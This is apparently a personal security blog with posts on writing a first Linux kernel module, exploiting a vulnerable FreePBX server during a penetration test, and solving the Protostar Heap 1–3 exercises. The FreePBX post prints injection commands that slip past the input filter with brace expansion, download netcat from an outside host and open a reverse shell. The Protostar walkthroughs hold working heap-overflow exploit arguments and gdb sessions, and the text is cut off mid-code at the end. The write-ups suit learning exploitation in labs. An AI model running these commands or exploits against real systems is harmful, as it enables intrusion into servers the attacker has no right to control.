Adventures in Linux Kernel — Task 01
Not long ago, after I started researching the Linux kernel, I got curious about how I could contribute to it, and I found a challenge. It is a step-by-step immersion into kernel module writing. There will be more!
The authors of this challenge ask participants not to post code publicly. I don’t agree with them, because the challenge is for people who are willing to learn, and such people a priori wouldn’t search for ready-to-use answers. However, I won’t post my code, out of respect for the creators of the challenge. If you need a nudge, feel free to contact me via email.
The first task was to write a kernel module. It is pretty easy if you are familiar with the C language. There are only three functions we need: init_module, cleanup_module, and printk. The main function here is init_module. From man we have:
init_module()
loads an ELF image into kernel space, performs any necessary symbol relocations, initializes module parameters to values provided by the caller, and then runs the module’s init function. This system call requires privilege.
On success, these system calls return 0. On error, -1 is returned and errno is set appropriately.
The module’s own init_module function is (almost) its main function: it is the init function that runs when the module is loaded. cleanup_module is the function that is called when the module is unloaded.
Then we can compile the module and load it:
make
insmod ./hello-1.ko
Then look at loaded modules:
cat /proc/modules | grep hello
Additionally you can see the last messages by using:
dmesg | tail -1
[ 1325.631657] Hello world!
It turned out not to be so easy, and I got the following response:
Please print to the kernel debug log level.
Please read the requirements for the Makefile and allow the module to be built against any kernel source tree on the filesystem, not just those kernels that happened to be installed in /lib/ at some point in time.
I was asked to do the following:
Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, “Hello World!”
The Makefile should be able to build the kernel module against the source of the currently-running kernel as well as being able to accept an arbitrary kernel sources directory from an environment variable.
I found this helpful for writing a Makefile that builds a kernel module on multiple distributions.
As for debug messages, they are simple and can be found here.
FreePBX Exploit and Brace Expansion
During one penetration test, I stumbled upon a server running a vulnerable version of FreePBX. I tried a couple of exploits, but most of them did not work. The only exploit that worked was this curl command.
To make running commands easier, I wrote a simple Python script.
Usage of the script: python freepbx.py <server> <command>
How it works
The developers attempted to prevent shell command injection by performing simple, yet inadequate, sanitization. Special characters were filtered, so I could not run nc -nv <ip> <port> or echo aaa > file.txt. I could only use one-word commands.
How can I use the exploit if I cannot use spaces? It turned out that it is possible to run commands without spaces by using the {ls,-l} syntax, which is called brace expansion. Brace expansion is a mechanism by which shells such as Bash generate arbitrary strings. It is similar to filename expansion, but the generated strings do not need to match existing files. For example, echo a{d,c,b}e would produce three strings: ade, ace, and abe.
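To make the expansion rule concrete, here is a minimal Python sketch of it. It is not how Bash implements brace expansion; the function name expand_braces is made up for illustration, and it assumes a single flat group with no nesting and no ranges such as {1..5}.

```python
import re

def expand_braces(word):
    """Expand the first comma-separated {a,b,c} group, then recurse on the rest.

    Simplified on purpose: no nested groups, no {1..5} ranges, no quoting rules.
    """
    match = re.search(r"\{([^{}]*,[^{}]*)\}", word)
    if match is None:
        return [word]  # nothing left to expand
    head, tail = word[:match.start()], word[match.end():]
    results = []
    for alternative in match.group(1).split(","):
        results.extend(expand_braces(head + alternative + tail))
    return results

print(expand_braces("a{d,c,b}e"))  # ['ade', 'ace', 'abe']
print(expand_braces("{ls,-l}"))    # ['ls', '-l']
```

The second call shows why the trick works: the shell sees two separate words, ls and -l, although the input contained no space.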
I needed to write files, but I could not use / or \. The workaround was to use a command such as echo "Hello world" | dd of=test.txt, where of stands for Output File.
Then I needed to get a reverse shell, but I could not use dots and slashes. However, I could run commands, write files, and use command substitution. Therefore, I could run the following command to get a dot symbol:
python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"
This command writes a dot symbol, taken from the ls output, into a file. The dot happened to be the 5th character of the first file name in this particular case.
Then I repeated the same process for the slash symbol, but this time I took it from the output of the pwd command, like this:
python freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"
Now it was possible to get a reverse shell:
python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw
Exploit Exercises — Protostar Heap 3
This level was harder than the previous ones. I needed to dive deep into how malloc works and how to exploit the unlink macro. Articles that helped me:
In our case we have 3 buffers, 32 bytes each:
a = malloc(32);
b = malloc(32);
c = malloc(32);
strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);
free(c);
free(b);
free(a);
Let’s see what happens when we run the program:
(gdb) b *main+136
Breakpoint 1 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) r AAAA BBBB CCCC
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff724) at heap3/heap3.c:24
24 heap3/heap3.c: No such file or directory.
in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x41414141 0x00000000
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x42424242 0x00000000
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x43434343 0x00000000
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
Now let’s see what happens after each free() call:
(gdb) disassemble main
...
0x08048911 <main+136>: call 0x8049824 <free>
0x08048916 <main+141>: mov eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>: mov DWORD PTR [esp],eax
0x0804891d <main+148>: call 0x8049824 <free>
0x08048922 <main+153>: mov eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>: mov DWORD PTR [esp],eax
0x08048929 <main+160>: call 0x8049824 <free>
0x0804892e <main+165>: mov DWORD PTR [esp],0x804ac27
0x08048935 <main+172>: call 0x8048790 <puts@plt>
(gdb) b *main+148
Breakpoint 2 at 0x804891d: file heap3/heap3.c, line 25.
(gdb) b *main+160
Breakpoint 3 at 0x8048929: file heap3/heap3.c, line 26.
(gdb) b *main+165
Breakpoint 4 at 0x804892e: file heap3/heap3.c, line 28.
We set two new breakpoints before the other free() calls and one after the last free(a) call. Continue the program, and we stop right before the second free call. Let’s examine the heap:
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
Then we step over the second call:
(gdb) c
Continuing.
Breakpoint 3, 0x08048929 in main (argc=4, argv=0xbffff724) at heap3/heap3.c:26
26 in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x41414141 0x00000000 ; a
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x0804c050 0x00000000 ; b
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000 ; c
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
And after free(a):
(gdb) c
Continuing.
Breakpoint 4, main (argc=4, argv=0xbffff724) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x0804c028 0x00000000 ; a
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x0804c050 0x00000000 ; b
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000 ; c
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
As we can see, the chunks are stored in singly linked lists. There’s a good explanation for this:
freed chunks smaller than 64 bytes are placed into a single-linked list
So we need to set the size of a chunk to more than 64 bytes so that unlink gets called.
After freeing all chunks we can look at bins:
(gdb) disassemble free
Dump of assembler code for function free:
...
0x0804982a <free+6>: mov DWORD PTR [ebp-0x38],0x804b160 ; bins address
...
(gdb) x/16x 0x804b160
0x804b160 <av_>: 0x00000048 0x00000000 0x00000000 0x00000000
0x804b170 <av_+16>: 0x0804c000 0x00000000 0x00000000 0x00000000
0x804b180 <av_+32>: 0x00000000 0x00000000 0x00000000 0x0804c078
0x804b190 <av_+48>: 0x00000000 0x00000000 0x00000000 0x0804b194
We can see that the fifth word of av_ (at av_+16) points to the first chunk (which is a, at address 0x0804c000).
Check whether we overwrote prev_size:
(gdb) r AAAA `python -c "print 'A'*32 + '\xfc\xff\xff\xff' + '\xf0'"` DEADBEEF
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c "print 'A'*32 + '\xfc\xff\xff\xff' + '\xf0'"` DEADBEEF
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff704) at heap3/heap3.c:24
24 in heap3/heap3.c
(gdb) x/32x 0x0804c058 - 8
0x804c050: 0xfffffffc 0x000000f0 0x44414544 0x46454542
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0c0: 0x00000000 0x00000000 0x00000000 0x00000000
Since PREV_INUSE is unset, free() will think that the chunk before c (buffer b) is free. Since we cannot use 0x00 bytes, we use a negative value for prev_size. We use 0xfffffffc, which is 0b11111111111111111111111111111100, or -4 as a signed value. Thus it will run p = chunk_at_offset(p, -(long)prevsz) and will treat p+4 as the previous chunk.
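The signed interpretation is easy to get wrong, so here is a small Python sketch of the arithmetic. The helper names to_signed32 and chunk_at_offset are illustrative stand-ins (the second mirrors the allocator macro only as plain address arithmetic), and the chunk address comes from the gdb dump above.

```python
def to_signed32(value):
    """Interpret a 32-bit word as a signed (two's complement) integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value

def chunk_at_offset(p, offset):
    """Address arithmetic only: p + offset, wrapped to 32 bits."""
    return (p + offset) & 0xFFFFFFFF

c_chunk = 0x0804C050    # header of chunk c, taken from the gdb dump
prev_size = 0xFFFFFFFC  # value written over prev_size by the overflow

prev_chunk = chunk_at_offset(c_chunk, -to_signed32(prev_size))
print(to_signed32(prev_size))  # -4
print(hex(prev_chunk))         # 0x804c054
```

Subtracting a negative prev_size moves forward, so the "previous" chunk lands 4 bytes inside chunk c, in memory we control through the third argument.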
If we call free on a chunk whose bk and fd pointers are overwritten, then we will overwrite fd+12 with bk and then bk+8 with fd. If you don’t understand it, take a look at the unlink macro again:
#define unlink( P, BK, FD ) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
Now let’s find what and where we need to write. Let’s find the address of winner():
$ readelf -Ws heap3 | grep winner
74: 08048864 37 FUNC GLOBAL DEFAULT 14 winner
For example, we want to replace puts() in the GOT:
user@protostar:/opt/protostar/bin$ readelf -r heap3 | grep puts
0804b128 00000e07 R_386_JUMP_SLOT 00000000 puts
Since unlink writes bk at fd+12, fd must be 0x0804b128 - 0x0c = 0x0804b11c.
So let’s test our exploit:
(gdb) r AAAA `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x64\x88\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 AAAA `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x64\x88\x04\x08'"`
Program received signal SIGSEGV, Segmentation fault.
0x08049906 in free (mem=0x804c058) at common/malloc.c:3638
3638 in common/malloc.c
It crashed. Let’s check whether we overwrote the GOT entry:
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048864
We did! But why did we get this SEGFAULT?
(gdb) x/i 0x08049906
0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx
(gdb) i r eax edx
eax 0x8048864 134514788
edx 0x804b11c 134525212
It’s getting clearer: it tried to write at winner() + 0x8 and got an error because winner() is in a read-only segment. To circumvent this, we will create shellcode that calls winner() and place it in a writable heap buffer. Then we’ll write the address of the shellcode into the GOT, and mov DWORD PTR [eax+0x8],edx will execute successfully.
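The two writes performed by unlink, and the reason the first attempt crashed, can be reproduced with a toy memory model in Python. This is only a sketch: the ToyMemory class and the writable address ranges are assumptions made for illustration, while the GOT, winner() and heap addresses are the ones shown in this walkthrough.

```python
class ToyMemory:
    """Word-addressed memory that rejects writes outside writable ranges."""

    def __init__(self, writable_ranges):
        self.writable_ranges = writable_ranges
        self.words = {}

    def write(self, addr, value):
        if not any(lo <= addr < hi for lo, hi in self.writable_ranges):
            raise MemoryError("write to read-only address 0x%08x" % addr)
        self.words[addr] = value

def unlink(mem, fd, bk):
    mem.write(fd + 12, bk)  # FD->bk = BK
    mem.write(bk + 8, fd)   # BK->fd = FD

GOT_PUTS = 0x0804B128  # puts() slot in the GOT (readelf -r)
WINNER = 0x08048864    # winner() in the read-only text segment
HEAP_A = 0x0804C008    # start of buffer a on the heap

# Hypothetical writable ranges: the page holding the GOT and the heap page.
mem = ToyMemory([(0x0804B000, 0x0804C000), (0x0804C000, 0x0804D000)])

try:
    unlink(mem, GOT_PUTS - 12, WINNER)  # bk points into read-only code
    first_attempt = "ok"
except MemoryError as exc:
    first_attempt = str(exc)
print(first_attempt)                    # the second write fails at winner()+8

unlink(mem, GOT_PUTS - 12, HEAP_A)      # bk points into the writable heap
print(hex(mem.words[GOT_PUTS]), hex(mem.words[HEAP_A + 8]))
```

In the first call the GOT write succeeds before the failing write, which matches what gdb showed: the GOT entry was already changed when the program crashed.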
Trying to use a pointer to the buffer instead of a direct pointer to winner():
(gdb) r `python -c "print 'A'*32"` `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 `python -c "print 'A'*32"` `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGSEGV, Segmentation fault.
0x08049951 in free (mem=0x804c058) at common/malloc.c:3648
3648 in common/malloc.c
(gdb) x/i $eip
0x8049951 <free+301>: mov DWORD PTR [eax+0xc],edx
(gdb) i r eax edx
eax 0x0 0
edx 0x0 0
Crashed again. At least we overwrote our first buffer (see the value at 0x804c010):
(gdb) x/24x 0x0804c000
0x804c000: 0x00000000 0x00000029 0x41414141 0x41414141
0x804c010: 0x0804b11c 0x41414141 0x41414141 0x41414141
0x804c020: 0x41414141 0x41414141 0x00000000 0x00000029
0x804c030: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c040: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c050: 0xfffffffc 0x000000f0 0x43434343 0x0804b11c
After a day of googling, I understood why this SEGFAULT happens: free() also inspects the next chunk, and the next chunk is not valid. So I needed to create a new fake chunk. I will use a -32 byte offset, which in hex representation is:
>>> i = -32
>>> hex(i & 0xffffffff)
'0xffffffe0'
Then I will create a “fake” header. The size in our fake header will be -8, which is 0xfffffff8. Thus the next-next chunk will point directly to the header of our b chunk, which has the PREV_INUSE bit set:
(gdb) r `python -c "print 'A'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 `python -c "print 'A'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGILL, Illegal instruction.
0x0804c035 in ?? ()
(gdb) x/16x $eip
0x804c035: 0x42ffffff 0x42424242 0x42424242 0x42424242
0x804c045: 0x42424242 0x42424242 0xfc424242 0xe0ffffff
0x804c055: 0xddffffff 0x94ffffff 0x940804b1 0x000804b1
0x804c065: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c008
A new crash (SIGILL this time), and we can be sure that we changed the control flow. Then I changed A to \xcc in order to hit breakpoints instead of shellcode:
(gdb) r `python -c "print '\xcc'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804c00d in ?? ()
Let’s look closer at the address where we jump to:
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c008
(gdb) x/16x 0x0804c008
0x804c008: 0x0804c028 0xcccccccc 0x0804b11c 0xcccccccc
0x804c018: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x804c028: 0x00000000 0x00000029 0x00000000 0xfffffff8
0x804c038: 0x42424242 0x42424242 0x42424242 0x42424242
0x0804c028 is just the address of the next chunk. It is there because free(a) was called. Let’s change the values a bit to jump over it:
(gdb) r `python -c "print '\xcc'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804c011 in ?? ()
(gdb) x/16x 0x0804c000
0x804c000: 0x00000000 0x00000029 0x0804c028 0xcccccccc
0x804c010: 0xcccccccc 0xcccccccc 0x0804b11c 0xcccccccc
0x804c020: 0xcccccccc 0xcccccccc 0x00000000 0x00000029
0x804c030: 0x00000000 0xfffffff8 0x42424242 0x42424242
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c010
After that, I modified the first buffer (where our shellcode is) to call winner():
$ rasm2 -a x86 -b32 'push 0x8048864; ret;'
6864880408c3
Then I changed the exploit:
(gdb) r `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
that wasn't too bad now, was it? @ 1484671479
Program exited with code 056.
Run from console:
./heap3 `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
that wasn't too bad now, was it? @ 1484671532
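For reference, the three arguments of the final command can be assembled from the values found along the way. This is a Python 3 sketch rather than the Python 2 one-liners used above; the helper name p32 and the variable names are mine, and the addresses are the ones from this walkthrough.

```python
import struct

def p32(value):
    """Pack a 32-bit value (signed or unsigned) as little-endian bytes."""
    return struct.pack("<I", value & 0xFFFFFFFF)

WINNER = 0x08048864          # address of winner()
GOT_PUTS = 0x0804B128        # GOT slot of puts()
SHELLCODE_ADDR = 0x0804C010  # buffer a + 8, past the word that free(a) overwrites

shellcode = b"\x68" + p32(WINNER) + b"\xc3"  # push 0x8048864; ret

arg_a = b"\xcc" * 8 + shellcode
# Fake chunk header inside b (size -8), then prev_size -4 and size -32 for c.
arg_b = b"BBBB" + p32(-8) + b"B" * 24 + p32(-4) + p32(-32)
# fd = GOT slot - 12, bk = address of the shellcode.
arg_c = b"CCCC" + p32(GOT_PUTS - 12) + p32(SHELLCODE_ADDR)

for name, arg in (("a", arg_a), ("b", arg_b), ("c", arg_c)):
    # strcpy() stops at a NUL byte, so none of the arguments may contain one.
    print(name, arg.hex(), b"\x00" in arg)
```

Using negative sizes is what keeps every argument free of NUL bytes, which strcpy() would otherwise treat as the end of the string.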
Exploit Exercises — Protostar Heap 2
There are a few interesting things here. The first one is in this code:
if(strlen(line + 5) < 31) {
strcpy(auth->name, line + 5);
}
We see that the length of the line parameter is checked. That means we cannot just overflow auth->name.
The second one is in this code:
auth = malloc(sizeof(auth));
When malloc() reserves space, it uses sizeof(auth). However, auth is a pointer. Thus, it uses the size of a pointer to the structure instead of the size of the structure itself. It should be sizeof(struct auth).
You can verify that the address increases by 0x10 each time we allocate new memory with the auth command:
auth a
[ auth = 0x804c008, service = (nil) ]
auth a
[ auth = 0x804c018, service = (nil) ]
0x10 is the space needed for:
- a chunk header
- auth space, which is just 4 bytes in our case
- padding to align the allocated memory on an 8-byte boundary
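The 0x10 step can also be checked numerically. The sketch below follows the glibc-style rounding rule (request plus one size word, rounded up to the alignment, with a minimum chunk size); the constants are my assumptions for a 32-bit build, not values read from this binary.

```python
SIZE_SZ = 4                       # assumed size of one size field on 32-bit
MALLOC_ALIGNMENT = 2 * SIZE_SZ    # chunks are aligned to 8 bytes
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 16                      # assumed smallest possible chunk

def request2size(request):
    """Chunk size the allocator would use for a malloc(request) call."""
    padded = (request + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(padded, MINSIZE)

print(hex(request2size(4)))   # 0x10: malloc(sizeof(auth)) with a 4-byte pointer
print(hex(request2size(32)))  # 0x28: the 32-byte buffers from Heap 3
```

The second value agrees with the 0x29 size fields in the Heap 3 dumps, which are 0x28 with the PREV_INUSE bit set.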
To understand how allocated memory looks, refer to this picture:

We see that the program uses strdup(), which allocates a copy of a char* string on the heap. In other words, it uses malloc() internally. So we can use this function to allocate additional heap memory.
We need to construct a pseudo heap chunk as if 32 bytes were allocated. Don’t forget to take into account the size of the chunk header used by strdup(). Then we need to write a variable right after it.
A brief explanation of what is going to happen. We need our memory to look like this after execution:
auth chunk header [8]
-------------------------- chunk header --------------------------
auth chunk data [4]
padding to be aligned [4] /* remember that 0x10 */
---- end of auth ----
service chunk header [8]
service chunk data [16] /* 16 is a calculated value */
------------------------ 32 bytes of data ------------------------
auth [4]
Construct and run the exploit:
$ python -c "print 'auth a'+'\n'+'service'+'A'*16+'\xff'+'\n'+'login'" | ./heap2
[ auth = (nil), service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]
Exploit Exercises — Protostar Heap 1
This level is different. Finding a vulnerability in the code is easy:
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
There are no buffer length checks. We can crash our program like this:
$ ./heap1 `python -c "print 'A'*30"` aaa
Segmentation fault
But when you use smaller input, it runs without any errors:
$ ./heap1 `python -c "print 'A'*20"` aaa
and that's a wrap folks!
Why is this happening? I started gdb and overflowed the input by 1 byte:
(gdb) r `python -c "print 'A'*21"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*21"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8040041 <Address 0x8040041 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
I noticed the 0x41 byte in the dest address passed to strcpy(). That looked strange, so I ran the program again, this time overflowing by 2 bytes:
(gdb) r `python -c "print 'A'*22"` aaa
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*22"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8004141 <Address 0x8004141 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
Clearly, we are overwriting the destination address passed to strcpy(). Since the second parameter passed to the function is aaa, we are in the second strcpy() call.
At this moment I realized how I could exploit this app. Since we control the address that the second strcpy() writes to, we can point it at the return address on the stack. The second strcpy() will then write the second input parameter there. As a result, we can change the program flow.
Let’s examine the stack after the crash:
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
(gdb) x/2x $esp
0xbffff640: 0x00000000 0x00000000
(gdb) x/20x $esp
0xbffff640: 0x00000000 0x00000000 0xbffff678 0x0804855a
0xbffff650: 0x41414141 0xbffff899 0x08048580 0xbffff678
0xbffff660: 0xb7ec6365 0x0804a008 0x0804a028 0xb7fd7ff4
0xbffff670: 0x08048580 0x00000000 0xbffff6f8 0xb7eadc76
0xbffff680: 0x00000003 0xbffff724 0xbffff734 0xb7fe1848
0x41414141 is the destination buffer address passed to strcpy(). It is followed by 0xbffff899, which is the address of the aaa string (we can see it in the error). Before 0x41414141 there are two addresses. They are probably the saved ebp and the saved eip (the return address). Let’s look at the registers:
(gdb) info registers
...
esp 0xbffff640 0xbffff640
ebp 0xbffff648 0xbffff648
...
eip 0xb7f09df4 0xb7f09df4 <*__GI_strcpy+20>
...
Our assumption is correct.
So we need to overwrite the i2->name pointer with the address of the return address on the stack. We start overwriting after 20 bytes, and we know the return address sits 3 words above esp, so its address is 0xbffff640 + 3*4 = 0xbffff64c. Let’s try to overwrite i2->name: run gdb and set a breakpoint on the second strcpy() call:
(gdb) b* 0x08048555
Breakpoint 1 at 0x8048555: file heap1/heap1.c, line 32.
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
Breakpoint 1, 0x08048555 in main (argc=3, argv=0xbffff724) at heap1/heap1.c:32
32 in heap1/heap1.c
If we look at our stack, we can see that it was successfully overwritten with 0x43434343 (see the value at memory address 0xbffff64c):
(gdb) s
...
(gdb) s
...
(gdb) x/24x $esp-12
0xbffff634: 0xb7ff6210 0xbffff87b 0xb7f09de0 0x00000000
0xbffff644: 0x00000000 0xbffff678 0x43434343 0xbffff64c
0xbffff654: 0xbffff894 0x08048580 0xbffff678 0xb7ec6365
0xbffff664: 0x0804a008 0x0804a028 0xb7fd7ff4 0x08048580
0xbffff674: 0x00000000 0xbffff6f8 0xb7eadc76 0x00000003
0xbffff684: 0xbffff724 0xbffff734 0xb7fe1848 0xbffff6e0
Now we need to replace the second parameter with the address of the winner() function. We can get the address of the function using readelf:
$ readelf -Ws heap1 | grep winner
55: 08048494 37 FUNC GLOBAL DEFAULT 14 winner
Or from gdb:
(gdb) print winner
$1 = {void (void)} 0x8048494 <winner>
Now we can run our exploit:
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484241540
Program received signal SIGILL, Illegal instruction.
0xbffff602 in ?? ()
If we run it directly from the console, it won’t work, because the environment variables differ and shift the stack addresses. Let’s find the correct address:
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffffdb0 "aaa") at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
(gdb) x/8x $esp
0xbffffb60: 0x00000000 0x00000000 0xbffffb98 0x0804855a
0xbffffb70: 0x41414141 0xbffffdb0 0x08048580 0xbffffb98
Calculate the address like before, 0xbffffb60 + 12 = 0xbffffb6c, and run the exploit in the console:
$ /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x6c\xfb\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484242022
Segmentation fault
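Both variants of the exploit differ only in the esp value observed at the crash, so the two arguments can be derived from it. A short Python 3 sketch, assuming the stack layout found above (return address 3 words above esp); build_args is a name made up for this example.

```python
import struct

WINNER = 0x08048494  # address of winner() from readelf / gdb

def build_args(esp_at_crash):
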